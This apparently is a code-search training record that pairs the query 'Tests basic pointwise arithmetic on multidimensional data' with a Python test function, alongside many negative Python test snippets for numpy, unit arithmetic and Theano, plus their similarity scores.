disable=no-member\n return unp.sqrt(data[..., 0] ** 2 + data[..., 1] ** 2) * self.scale", "def test_array_mult(self):\n # pylint: disable=no-member\n ident_2_2 = np.array([[1, 1], [1, 1]])\n\n # Unit times a 2D array\n meter_ident_2_2 = self.meter * ident_2_2\n self.assertEqual(meter_ident_2_2[0][0], self.meter)\n self.assertEqual(meter_ident_2_2[0][1], self.meter)\n self.assertEqual(meter_ident_2_2[1][0], self.meter)\n self.assertEqual(meter_ident_2_2[1][1], self.meter)\n\n # 2D arrays multiplying each other (arrays multiply point by\n # point)\n matr_2_2 = np.array([[1, 2], [3, 4]])\n matr_mult = meter_ident_2_2 * matr_2_2\n self.assertEqual(matr_mult[0][0], self.meter)\n self.assertEqual(matr_mult[0][1], 2 * self.meter)\n self.assertEqual(matr_mult[1][0], 3 * self.meter)\n self.assertEqual(matr_mult[1][1], 4 * self.meter)", "def test__repeated_median(repeated_median):\n x, y, *_ = repeated_median\n assert repeated_median_slope(x, y) == 5.0", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def test_euclidean_distance_2dimension(self):\n dist_from_origin = lambda v: euclidean_distance([0, 0], v)\n\n # Do it first with known whole numbers\n self.assertEqual(5, dist_from_origin([3, 4]))\n 
self.assertEqual(5, dist_from_origin([-3, -4]))\n\n self.assertEqual(13, dist_from_origin([5, 12]))\n self.assertEqual(13, dist_from_origin([-5, -12]))\n\n self.assertEqual(15, dist_from_origin([9, 12]))\n self.assertEqual(15, dist_from_origin([-9, -12]))\n\n self.assertEqual(52, dist_from_origin([20, 48]))\n self.assertEqual(52, dist_from_origin([-20, -48]))\n\n # Next we will do it with a couple doubles, but we need\n # to round\n self.assertEqual(8.6023, round(dist_from_origin([5, 7]), 4))\n self.assertEqual(8.6023, round(dist_from_origin([-5, -7]), 4))\n\n self.assertEqual(13.0384, round(dist_from_origin([7, 11]), 4))\n self.assertEqual(13.0384, round(dist_from_origin([-7, -11]), 4))\n\n self.assertEqual(17.0294, round(dist_from_origin([11, 13]), 4))\n self.assertEqual(17.0294, round(dist_from_origin([-11, -13]), 4))\n\n dist_from_initial = lambda v: euclidean_distance([7, 23], v)\n\n # Do it first with known whole numbers\n self.assertEqual(5, dist_from_initial([7 + 3, 23 + 4]))\n self.assertEqual(5, dist_from_initial([7 - 3, 23 - 4]))\n\n self.assertEqual(13, dist_from_initial([7 + 5, 23 + 12]))\n self.assertEqual(13, dist_from_initial([7 - 5, 23 - 12]))\n\n self.assertEqual(15, dist_from_initial([7 + 9, 23 + 12]))\n self.assertEqual(15, dist_from_initial([7 - 9, 23 - 12]))\n\n self.assertEqual(52, dist_from_initial([7 + 20, 23 + 48]))\n self.assertEqual(52, dist_from_initial([7 + 20, 23 + 48]))\n\n # Next we do it with some doubles which require rounding\n self.assertEqual(8.6023, round(dist_from_initial([7 + 5, 23 + 7]), 4))\n self.assertEqual(8.6023, round(dist_from_initial([7 - 5, 23 - 7]), 4))\n\n self.assertEqual(13.0384, round(dist_from_initial([7 + 7, 23 + 11]), 4))\n self.assertEqual(13.0384, round(dist_from_initial([7 - 7, 23 - 11]), 4))\n\n self.assertEqual(17.0294, round(dist_from_initial([7 + 11, 23 + 13]), 4))\n self.assertEqual(17.0294, round(dist_from_initial([7 - 11, 23 - 13]), 4))", "def test_many_decimal_data_points(self):\r\n values = [3.14, 42, 2.718281, 1.41421, 10]\r\n expect_mean_result = 11.854498\r\n expected_sd_result = 15.36621\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertAlmostEqual(expect_mean_result, result['mean_result'], 4)\r\n self.assertAlmostEqual(expected_sd_result, result['sd_result'], 4)", "def test_multiple(self):\n df = self.df.copy()\n for renorm in [True, False]:\n with self.subTest(renorm=renorm):\n out = nan_weighted_compositional_mean(df.values, renorm=renorm)\n if renorm:\n self.assertTrue(np.allclose(np.sum(out, axis=-1), 1.0))", "def test_maths(self):\n\n # Test that basic integers work\n self.assertEqual(int(1) + int(1), int(2), \"Basic addition failed\")\n self.assertNotEqual(int(1) + int(1), int(3), \"Basic addition failed\")\n\n # Test doubles\n # FIXME: Deployment fails for some reason. Maybe bug in CPU? 
Commenting it out.\n # self.assertEqual(float(0.1) + float(0.2), float(0.3), \"Floating addition failed\")\n self.assertNotEqual(float(1) + float(1), float(3), \"Floating Addition failed\")", "def test_conservation(self):\n t, x_n, x_s, x_p = self.t, self.x_n, self.x_s, self.x_p\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n for x in [x_n, x_s, x_p]:\n np.testing.assert_array_almost_equal(\n self.i_s(t, x) + self.i_e(t, x), i_cell, decimal=2\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_n), self.i_s_n(t, x_n), decimal=3\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_p), self.i_s_p(t, x_p), decimal=3\n )", "def test_applyFunction(self):\n\n ptwise_linear = XYs1d(axes=XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: ('crossSection', 'b'),\n XYs1dModule.xAxisIndex: ('energy_in', 'eV')}), data=[[1e-5, 1.0], [20.0e6, 21.0]])\n\n self.assertAlmostEqual(ptwise_linear.evaluate(15.0e6), 16.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(15.0e6), math.exp(-16.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.evaluate(1.0e6), 2.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(1.0e6), math.exp(-2.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-ptwise_linear.evaluate(x)), None).evaluate(1.0e6), math.exp(-2.0), 3) # This should absolutely fail and is the wrong way to do it", "def dot(v,w):\n return sum(v_i * w_i for v_i, w_i in zip(v,w)\n\ndef sum_of_squares(v):\n return dot(v, v)\n\nimport math", "def test_func(x, a, b, c, d):\n return a + b * x + c * x**2 + d * x**3" ]
[ "0.6385182", "0.6282518", "0.61600417", "0.61573863", "0.6152449", "0.61160505", "0.60762215", "0.6071223", "0.60207266", "0.6017882", "0.6017163", "0.59854347", "0.59580594", "0.59534204", "0.5947321", "0.591167", "0.5898243", "0.58920926", "0.58749056", "0.58674467", "0.586009", "0.5858972", "0.5850909", "0.5845129", "0.5821008", "0.5808885", "0.58082724", "0.580473", "0.5804137", "0.5803243", "0.58016", "0.5798565", "0.57727706", "0.5769337", "0.5758641", "0.5757021", "0.5756332", "0.57557017", "0.5753458", "0.57384396", "0.5730069", "0.5723253", "0.57109374", "0.5700305", "0.5697601", "0.5696897", "0.56942075", "0.56891096", "0.56865335", "0.5683323", "0.56817", "0.5673172", "0.56720567", "0.5670916", "0.56681114", "0.5660095", "0.56586874", "0.5658196", "0.56543165", "0.56457657", "0.5629596", "0.56266785", "0.5612528", "0.5607722", "0.56047195", "0.5604223", "0.56020576", "0.56008595", "0.56006676", "0.5586253", "0.5579853", "0.55779314", "0.5575959", "0.55754477", "0.5575002", "0.5569858", "0.5560904", "0.55568486", "0.5554909", "0.5554108", "0.55488604", "0.55385023", "0.5528213", "0.55276984", "0.5521267", "0.5520712", "0.55166376", "0.55165476", "0.5515214", "0.5509231", "0.5506815", "0.5505661", "0.55045986", "0.54980767", "0.5495982", "0.5481001", "0.5479907", "0.54779613", "0.5473835", "0.5471621", "0.54711825" ]
0.0
-1
Tests basic pointwise arithmetic on multidimensional data
def test_deep(self, expr, result, mode):
    i, j, k, l = dimify('i j k l')
    a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode)
    b = symbol(name='b', dimensions=(j, k), value=3., mode=mode)
    fa = a.base.function if mode == 'indexed' else a
    fb = b.base.function if mode == 'indexed' else b
    eqn = eval(expr)
    Operator(eqn)(fa, fb)
    assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_multidimensional_operation(self):\n # start with something (1, 2, 3)\n data = np.array([[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]])\n\n # split 1st dim (2, 2, 3)\n coefficients = np.ones((1, 2)) / 2\n expected = np.array(\n [[[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]], [[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]]]\n )\n actual = Adaptor.convert_with_coefficients(data, coefficients, 0)\n np.testing.assert_allclose(actual, expected)\n\n # sum 3rd dim (2, 2, 1)\n coefficients = np.ones((3, 1))\n expected = np.array([[[1.5], [6.0]], [[1.5], [6.0]]])\n actual = Adaptor.convert_with_coefficients(actual, coefficients, 2)\n np.testing.assert_allclose(actual, expected)", "def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z", "def test_sum_squares(self):\n fun = get_problem('sum_squares', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test01(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"c * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test03(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test02(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n cr = bcolz.eval(\"a * b\", rootdir=self.rootdir)\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def test_array_mult(self):\n # pylint: disable=no-member\n ident_2_2 = np.array([[1, 1], [1, 1]])\n\n # Unit times a 2D array\n meter_ident_2_2 = self.meter * ident_2_2\n self.assertEqual(meter_ident_2_2[0][0], self.meter)\n self.assertEqual(meter_ident_2_2[0][1], self.meter)\n self.assertEqual(meter_ident_2_2[1][0], self.meter)\n self.assertEqual(meter_ident_2_2[1][1], self.meter)\n\n # 2D arrays multiplying each other (arrays multiply point by\n # point)\n matr_2_2 = np.array([[1, 2], [3, 4]])\n matr_mult = meter_ident_2_2 * matr_2_2\n self.assertEqual(matr_mult[0][0], self.meter)\n self.assertEqual(matr_mult[0][1], 2 * self.meter)\n self.assertEqual(matr_mult[1][0], 3 * self.meter)\n self.assertEqual(matr_mult[1][1], 4 * self.meter)", "def test_results():\n x = 0.5\n np.testing.assert_almost_equal(nbf.sum_x_n_calc(\n x, z_n, k_n_1), 
npf.sum_x_n_calc(x, z_n, k_n_1))", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# 
(fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def test_basic_calculation(self):\n expected_result = np.array(\n [\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n ],\n dtype=np.float32,\n )\n result = calculate_sleet_probability(self.rain_prob_cube, self.snow_prob_cube)\n self.assertArrayAlmostEqual(result.data, expected_result)\n self.assertTrue(result.dtype == np.float32)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_safe_sum_p_log_p(self):\r\n m = array([2, 4, 0, 8])\r\n self.assertEqual(safe_sum_p_log_p(m, 2), 2 * 1 + 4 * 2 + 8 * 3)", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_multiple(self):\n df = self.df.copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def test05(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n 
expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_equal13():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def CustomMathTest(): \n \n def CheckEqual(iterator):\n return len(set(iterator)) <= 1\n \n print(\"\")\n print(\" ..Testing.. \")\n print(\"\")\n \n Tests = []\n\n #Setup\n c = [1,2,3,nan,3]\n c2 = ma.masked_array(c,isnan(c))\n #Python has a less-comfortable handling of missing values.\n c3 = [2,3,-1,4,0]\n \n\n print(\"Testing MeanNa...\")\n Expected = [1.0, 2.0, 3.0, 2.25, 3.0]\n Actual = MeanNa(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n print(\"Testing Catch...\")\n Expected = [0,1,.5,0]\n Actual = [Catch(.4),Catch(.6),Catch(.4,.3),Catch(.4,.1)]\n print(Expected)\n print(Actual)\n print(Actual==Expected)\n Tests.append((Actual==Expected))\n print(\"\")\n \n print(\"Testing Influence...\")\n Expected = [array([ 0.88888889]), array([ 1.33333333]), array([ 1.]), array([ 1.33333333])]\n Actual = Influence(GetWeight(c2))\n print(Expected)\n print(Actual)\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True\n print(Flag)\n Tests.append(Flag) \n print(\"\")\n \n print(\"Testing ReWeight...\")\n Expected = [0.08888888888888889, 0.17777777777777778, 0.26666666666666666, 0.2, 0.26666666666666666]\n Actual = ReWeight(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n Votes = array([[1,1,0,0], \n [1,0,0,0],\n [1,1,0,0],\n [1,1,1,0],\n [0,0,1,1],\n [0,0,1,1]])\n \n Votes = ma.masked_array(Votes,isnan(Votes))\n \n print(\"Testing ReverseMatrix...\")\n Expected = array([[0, 0, 1, 1],\n [0, 1, 1, 1],\n [0, 0, 1, 1],\n [0, 0, 0, 1],\n [1, 1, 0, 0],\n [1, 1, 0, 0]])\n Actual = ReverseMatrix(Votes)\n print(Expected)\n print(Actual)\n Flag=False\n if(sum(Expected==Actual)==24):\n Flag=True\n print(Flag)\n Tests.append(Flag)\n print(\"\") \n \n print(\"Testing WeightedPrinComp...\")\n Expected = array([-0.81674714, -0.35969107, -0.81674714, -0.35969107, 1.17643821, 1.17643821])\n Actual = WeightedPrinComp(Votes)[1]\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True \n print(Flag)\n Tests.append(Flag) \n print(\"\") \n \n print(\" *** TEST RESULTS ***\")\n print(Tests)\n print(CheckEqual(Tests))\n \n return(CheckEqual(Tests))", "def test_scalar_index(self):\n dset = self.f.create_dataset('x', shape=(), dtype='f')\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, ())", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_pinter(self):\n fun = get_problem('pinter', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_single(self):\n df = self.df.head(1).copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n 
self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_multiplying(self):\n multiplier = Multiplier()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i*j, multiplier.calc(j, i))", "def test_scalar_multiplication(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n a2 = a1 * 3.5\n a3 = a1 * 0.5\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 3.5, -7, 10.5, -14))\n self.assertEqual(a3,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def testDotProduct(self):\n\n self._check([0.000, 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([0.125, 0.750, 0.125], [ 1023, 1023, 1023 ])\n self._check([1/32., 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([1.000, 1.000, 1.000], [ 1023, 1023, 1023 ])\n self._check([0, 0, 0], [ 1023, 1023, 1023 ])\n self._check([1/32., 0, 0], [ 1, 100, 100 ])\n self._check([1.0, 0, 0], [ 1, 100, 100 ])\n self._check([0, 1.0, 0], [ 1, 100, 100 ])\n self._check([0, 0, 1.0], [ 1, 100, 100 ])\n self._check([1.000, 1.000, 1.000], [ 513, 513, 513 ])\n self._check([1.000, 1.000, 1.000], [ 512, 512, 512 ])\n self._check([1.000, 1.000, 1.000], [ 0, 512, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 680, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 681, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 682, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 683, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 341, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 342, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 1023-338, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-341, 0 ])\n\n self._check([0.000, -1.0, 0.000], [ 0, 500, 0 ])\n self._check([1/32., -1.0, 1/32.], [ 500, 500, 500 ])\n self._check([-1/32., -1.0, -1/32.], [ 400, 400, 400 ])\n\n for idx in range(100):\n data = [ random.randint(0,1023) for r in range(3) ]\n coeff = [ max(-2.0, min(127/32., random.random() * 4 - 2)) for r in range(3) ]\n #print coeff, data\n self._check(coeff, data)", "def test_coords():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n\n return x, y", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mul(x, y):\n\n assert mul(x, y) == pytest.approx(mul(y, x))", "def test_local_dot22_to_dot22scalar():\r\n A = T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, 
y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = 